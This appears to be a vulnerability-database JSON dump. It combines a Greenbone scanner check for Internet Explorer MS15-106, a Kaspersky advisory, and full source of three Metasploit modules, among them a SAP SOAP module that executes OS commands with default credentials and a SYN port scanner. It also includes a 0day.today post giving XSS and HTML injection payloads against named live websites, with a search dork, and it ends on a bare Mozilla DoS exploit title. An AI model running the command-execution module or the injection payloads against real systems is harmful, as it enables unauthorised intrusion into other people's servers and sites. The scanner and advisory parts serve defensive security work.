(Wed, 14 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (3096441)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS15-106.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Multiple improper handling memory objects,\n\n - Improper permissions validation, allowing a script to be run with elevated\n privileges.\n\n - An error in 'CAttrArray' object implementation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to corrupt memory and potentially execute arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version\n 7.x/8.x/9.x/10.x/11.x\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3096441\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/MS15-106\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n win8:1, win8x64:1, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([7-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(dllVer =~ \"^7\\.0\\.6002\\.1\"){\n Vulnerable_range = \"7.0.6002.18000 - 7.0.6002.19487\";\n}\nelse if (dllVer =~ \"^7\\.0\\.6002\\.2\"){\n Vulnerable_range = \"7.0.6002.23000 - 7.0.6002.23797\";\n}\nelse if (dllVer =~ \"^8\\.0\\.6001\\.1\"){\n Vulnerable_range = \"8.0.6001.18000 - 8.0.6001.19689\";\n}\nelse if (dllVer =~ \"^8\\.0\\.6001\\.2\"){\n Vulnerable_range = \"8.0.6001.20000 - 8.0.6001.23749\";\n}\nelse if (dllVer =~ \"^9\\.0\\.8112\\.1\"){\n Vulnerable_range = \"9.0.8112.16000 - 9.0.8112.16707\";\n}\nelse if (dllVer =~ \"^9\\.0\\.8112\\.2\"){\n Vulnerable_range = \"9.0.8112.20000 - 9.0.8112.20822\";\n}\nelse if (dllVer =~ \"^8\\.0\\.7601\\.1\"){\n Vulnerable_range = \"8.0.7601.17000 - 8.0.7601.19002\";\n}\nelse if (dllVer =~ \"^8\\.0\\.7601\\.2\"){\n Vulnerable_range = \"8.0.7601.22000 - 8.0.7601.23205\";\n}\nelse if (dllVer =~ \"^10\\.0\\.9200\\.1\"){\n Vulnerable_range = \"10.0.9200.16000 - 10.0.9200.17518\";\n}\nelse if (dllVer =~ \"^10\\.0\\.9200\\.2\"){\n Vulnerable_range = \"10.0.9200.21000 - 10.0.9200.21635\";\n}\n\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19487\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.23000\", test_version2:\"7.0.6002.23797\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19689\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23749\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16707\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20822\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.17000\", test_version2:\"8.0.7601.19002\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.22000\", test_version2:\"8.0.7601.23205\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16707\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20822\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17518\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.21000\", test_version2:\"10.0.9200.21635\"))\n {\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer, test_version:\"11.0.9600.00000\", test_version2:\"11.0.9600.18056\")){\n Vulnerable_range = \"11.0.9600.00000 - 11.0.9600.18056\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8:1, win2012:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.17518\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.21635\")){\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"11.0.9600.18052\")){\n Vulnerable_range = \"less than 11.0.9600.18052\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"10.0.10240.16566\"))\n {\n Vulnerable_range = \"Less than 10.0.10240.16566\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Mshtml.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:20", "bulletinFamily": "info", "description": "### *Detect date*:\n10/13/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to bypass security restrictions, gain privileges, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions from 7 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2015-2482](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-2482>) \n[CVE-2015-6055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6055>) \n[CVE-2015-6059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6059>) \n[CVE-2015-6052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6052>) \n[CVE-2015-6044](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6044>) \n[CVE-2015-6047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6047>) \n[CVE-2015-6056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6056>) \n[CVE-2015-6053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6053>) \n[CVE-2015-6050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6050>) \n[CVE-2015-6051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6051>) \n[CVE-2015-6048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6048>) \n[CVE-2015-6049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6049>) \n[CVE-2015-6046](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6046>) \n[CVE-2015-6042](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-6042>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2015-2482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482>)9.3Critical \n[CVE-2015-6055](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6055>)9.3Critical \n[CVE-2015-6059](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6059>)4.3Critical \n[CVE-2015-6052](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6052>)4.3Critical \n[CVE-2015-6044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6044>)6.8Critical \n[CVE-2015-6047](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6047>)6.8Critical \n[CVE-2015-6056](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6056>)9.3Critical \n[CVE-2015-6053](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6053>)5.0Critical \n[CVE-2015-6050](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6050>)9.3Critical \n[CVE-2015-6051](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6051>)4.3Critical \n[CVE-2015-6048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6048>)9.3Critical \n[CVE-2015-6049](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6049>)9.3Critical \n[CVE-2015-6046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6046>)4.3Critical \n[CVE-2015-6042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6042>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3097617](<http://support.microsoft.com/kb/3097617>) \n[3094995](<http://support.microsoft.com/kb/3094995>) \n[3094996](<http://support.microsoft.com/kb/3094996>) \n[3093983](<http://support.microsoft.com/kb/3093983>) \n[3096441](<http://support.microsoft.com/kb/3096441>)", "modified": "2019-03-07T00:00:00", "published": "2015-10-13T00:00:00", "id": "KLA10677", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10677", "title": "\r KLA10677Multiple vulnerabilities in Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-04T23:03:18", "bulletinFamily": "exploit", "description": "This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in the SM69 transaction.\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-07T15:06:28", "id": "MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_RFC_SXPG_COMMAND_EXEC", "href": "", "type": "metasploit", "title": "SAP SOAP RFC SXPG_COMMAND_EXECUTE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',\n 'Description' => %q{\n This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through\n the use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured\n in the SM69 transaction.\n },\n 'References' =>\n [\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'Author' =>\n [\n 'Agnivesh Sathasivam',\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP Client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992']),\n OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),\n OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),\n OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])\n ])\n end\n\n def run_host(ip)\n os = datastore['OS']\n data = '<?xml version=\"1.0\" encoding=\"utf-8\" ?>'\n data << '<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n data << '<env:Body>'\n data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">'\n if datastore['PARAM']\n data << '<ADDITIONAL_PARAMETERS>' + datastore['PARAM'] + ' </ADDITIONAL_PARAMETERS>'\n else\n data << '<ADDITIONAL_PARAMETERS> </ADDITIONAL_PARAMETERS>'\n end\n data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'\n data << '<OPERATINGSYSTEM>' + os + '</OPERATINGSYSTEM>'\n data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'\n data << '</n1:SXPG_COMMAND_EXECUTE>'\n data << '</env:Body>'\n data << '</env:Envelope>'\n print_status(\"[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request\")\n begin\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'cookie' => \"sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}\",\n 'ctype' => 'text/xml; charset=UTF-8',\n 'encode_params' => false,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' =>{\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n if res and res.code != 500 and res.code != 200\n # to do - implement error handlers for each status code, 404, 301, etc.\n print_error(\"[SAP] #{ip}:#{rport} - something went wrong!\")\n return\n elsif res and res.body =~ /faultstring/\n error = res.body.scan(%r{<faultstring>(.*?)</faultstring>}).flatten\n 0.upto(error.length-1) do |i|\n print_error(\"[SAP] #{ip}:#{rport} - error #{error[i]}\")\n end\n return\n elsif res\n print_status(\"[SAP] #{ip}:#{rport} - got response\")\n saptbl = Msf::Ui::Console::Table.new(\n Msf::Ui::Console::Table::Style::Default,\n 'Header' => \"[SAP] SXPG_COMMAND_EXECUTE \",\n 'Prefix' => \"\\n\",\n 'Postfix' => \"\\n\",\n 'Indent' => 1,\n 'Columns' =>[\"Output\",]\n )\n output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten\n for i in 0..output.length-1\n saptbl << [output[i]]\n end\n print(saptbl.to_s)\n return\n else\n print_error(\"[SAP] #{ip}:#{rport} - Unknown error\")\n return\n end\n rescue ::Rex::ConnectionError\n print_error(\"[SAP] #{ip}:#{rport} - Unable to connect\")\n return\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb"}, {"lastseen": "2019-12-09T08:59:14", "bulletinFamily": "exploit", "description": "Discover active pcAnywhere services through UDP\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-27T18:35:39", "id": "MSF:AUXILIARY/SCANNER/PCANYWHERE/PCANYWHERE_UDP", "href": "", "type": "metasploit", "title": "PcAnywhere UDP Service Discovery", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::UDPScanner\n\n def initialize\n super(\n 'Name' => 'PcAnywhere UDP Service Discovery',\n 'Description' => 'Discover active pcAnywhere services through UDP',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://www.unixwiz.net/tools/pcascan.txt']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(5632)\n ])\n end\n\n def scanner_prescan(batch)\n print_status(\"Sending pcAnywhere discovery requests to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)\")\n @results = {}\n end\n\n def scan_host(ip)\n scanner_send(\"NQ\", ip, datastore['RPORT'])\n scanner_send(\"ST\", ip, datastore['RPORT'])\n end\n\n def scanner_postscan(batch)\n @results.keys.each do |ip|\n data = @results[ip]\n info = \"\"\n\n if data[:name]\n info << \"Name: #{data[:name]} \"\n end\n\n if data[:stat]\n info << \"- #{data[:stat]} \"\n end\n\n if data[:caps]\n info << \"( #{data[:caps]} ) \"\n end\n\n report_service(:host => ip, :port => datastore['RPORT'], :proto => 'udp', :name => \"pcanywhere_stat\", :info => info)\n report_note(:host => ip, :port => datastore['RPORT'], :proto => 'udp', :name => \"pcanywhere_stat\", :update => :unique, :ntype => \"pcanywhere.status\", :data => data )\n print_good(\"#{ip}:#{datastore['RPORT']} #{info}\")\n end\n end\n\n def scanner_process(data, shost, sport)\n case data\n when /^NR(........................)(........)/\n\n name = $1.dup\n caps = $2.dup\n\n name = name.gsub(/_+$/, '').gsub(\"\\x00\", '').strip\n caps = caps.gsub(/_+$/, '').gsub(\"\\x00\", '').strip\n\n @results[shost] ||= {}\n @results[shost][:name] = name\n @results[shost][:caps] = caps\n\n when /^ST(.+)/\n @results[shost] ||= {}\n buff = $1.dup\n stat = 'Unknown'\n\n if buff[2,1].unpack(\"C\")[0] == 67\n stat = \"Available\"\n end\n\n if buff[2,1].unpack(\"C\")[0] == 11\n stat = \"Busy\"\n end\n\n @results[shost][:stat] = stat\n else\n print_error(\"#{shost} Unknown: #{data.inspect}\")\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb"}, {"lastseen": "2019-11-23T19:15:33", "bulletinFamily": "exploit", "description": "Enumerate open TCP services using a raw SYN scan.\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-26T14:55:53", "id": "MSF:AUXILIARY/SCANNER/PORTSCAN/SYN", "href": "", "type": "metasploit", "title": "TCP SYN Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'TCP SYN Port Scanner',\n 'Description' => %q{\n Enumerate open TCP services using a raw SYN scan.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE\n )\n\n register_options([\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 22-25,80,110-900)\", \"1-10000\"]),\n OptInt.new('TIMEOUT', [true, \"The reply read timeout in milliseconds\", 500]),\n OptInt.new('BATCHSIZE', [true, \"The number of hosts to scan per set\", 256]),\n OptInt.new('DELAY', [true, \"The delay between connections, per thread, in milliseconds\", 0]),\n OptInt.new('JITTER', [true, \"The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.\", 0]),\n OptString.new('INTERFACE', [false, 'The name of the interface'])\n ])\n\n deregister_options('FILTER','PCAPFILE')\n end\n\n # No IPv6 support yet\n def support_ipv6?\n false\n end\n\n def run_batch_size\n datastore['BATCHSIZE'] || 256\n end\n\n def run_batch(hosts)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n if ports.empty?\n raise Msf::OptionValidateError.new(['PORTS'])\n end\n\n jitter_value = datastore['JITTER'].to_i\n if jitter_value < 0\n raise Msf::OptionValidateError.new(['JITTER'])\n end\n\n delay_value = datastore['DELAY'].to_i\n if delay_value < 0\n raise Msf::OptionValidateError.new(['DELAY'])\n end\n\n open_pcap\n pcap = self.capture\n\n to = (datastore['TIMEOUT'] || 500).to_f / 1000.0\n\n # we copy the hosts because some may not be reachable and need to be ejected\n host_queue = hosts.dup\n # Spread the load across the hosts\n ports.each do |dport|\n host_queue.each do |dhost|\n shost, sport = getsource(dhost)\n\n self.capture.setfilter(getfilter(shost, sport, dhost, dport))\n\n # Add the delay based on JITTER and DELAY if needs be\n add_delay_jitter(delay_value,jitter_value)\n\n begin\n probe = buildprobe(shost, sport, dhost, dport)\n\n unless capture_sendto(probe, dhost)\n host_queue.delete(dhost)\n next\n end\n\n reply = probereply(self.capture, to)\n\n next if not reply\n\n if (reply.is_tcp? and reply.tcp_flags.syn == 1 and reply.tcp_flags.ack == 1)\n print_good(\" TCP OPEN #{dhost}:#{dport}\")\n report_service(:host => dhost, :port => dport)\n end\n rescue ::Exception\n print_error(\"Error: #{$!.class} #{$!}\")\n end\n end\n end\n\n close_pcap\n end\n\n def getfilter(shost, sport, dhost, dport)\n # Look for associated SYN/ACKs and RSTs\n \"tcp and (tcp[13] == 0x12 or (tcp[13] & 0x04) != 0) and \" +\n \"src host #{dhost} and src port #{dport} and \" +\n \"dst host #{shost} and dst port #{sport}\"\n end\n\n def getsource(dhost)\n # srcip, srcport\n [ Rex::Socket.source_address(dhost), rand(0xffff - 1025) + 1025 ]\n end\n\n def buildprobe(shost, sport, dhost, dport)\n p = PacketFu::TCPPacket.new\n p.ip_saddr = shost\n p.ip_daddr = dhost\n p.tcp_sport = sport\n p.tcp_flags.ack = 0\n p.tcp_flags.syn = 1\n p.tcp_dport = dport\n p.tcp_win = 3072\n p.recalc\n p\n end\n\n def probereply(pcap, to)\n reply = nil\n begin\n Timeout.timeout(to) do\n pcap.each do |r|\n pkt = PacketFu::Packet.parse(r)\n next unless pkt.is_tcp?\n reply = pkt\n break\n end\n end\n rescue Timeout::Error\n end\n return reply\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/portscan/syn.rb"}], "zdt": [{"lastseen": "2018-01-08T17:56:32", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-05-26T00:00:00", "published": "2010-05-26T00:00:00", "id": "1337DAY-ID-12403", "href": "https://0day.today/exploit/description/12403", "type": "zdt", "title": "Webit Cms (XSS/HTML) Injection Vulnerabilities", "sourceData": "==============================================\r\nWebit Cms (XSS/HTML) Injection Vulnerabilities\r\n==============================================\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 #################################### 1\r\n0 I'm XroGuE member from Inj3ct0r Team 1\r\n1 #################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n\r\n#########################################\r\n# Name: Webit Cms (XSS/HTML) Injection Vulnerabilities\r\n# Vendor: http://www.webitcms.gr\r\n# Date: 2010-05-26\r\n# Author: XroGuE\r\n# Thanks to: Inj3ct0r.com [R0073r],Exploit-DB.com,SecurityReason.com,Hack0wn.com !\r\n# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com\r\n# Home: (-_+)\r\n##########################################\r\n\r\n[+] Dork: intext:\"powered by webit! cms\"\r\n\r\n[+] XSS InjecTion Vulnerability:\r\n\r\n[+] Vulnerability: www.site.com/[path]/main.php?sid=[XSS]\r\n\r\n[+] Live Demo: http://www.poseidonms.com/templates/main/main.php?sid=<script>alert(/XroGuE/);</script>\r\n\r\n[+] Live Demo: http://www.d-tales.gr/templates/main/main.php?sid=<script>alert(/XroGuE/);</script>\r\n\r\n###########################################\r\n\r\n[+] HTML InjecTion Vulnerability\r\n\r\n[+] Vulnerability: www.site.com/[path]/main.php?sid=[HTML]\r\n\r\n[+] Live Demo: http://www.poseidonms.com/templates/main/main.php?sid=<marquee><font color=red size=15>XroGuE</font></marquee>\r\n\r\n[+] Live Demo: http://www.d-tales.gr/templates/main/main.php?sid=<marquee><font color=red size=15>XroGuE</font></marquee>\r\n\r\n###########################################\r\n\r\n\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12403"}]}

Mozilla (Firefox &lt;= 1.0.7) (Mozilla &lt;= 1.7.12) Denial of Service Exploit

Description

Exploit for multiple platform in category dos / poc

Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit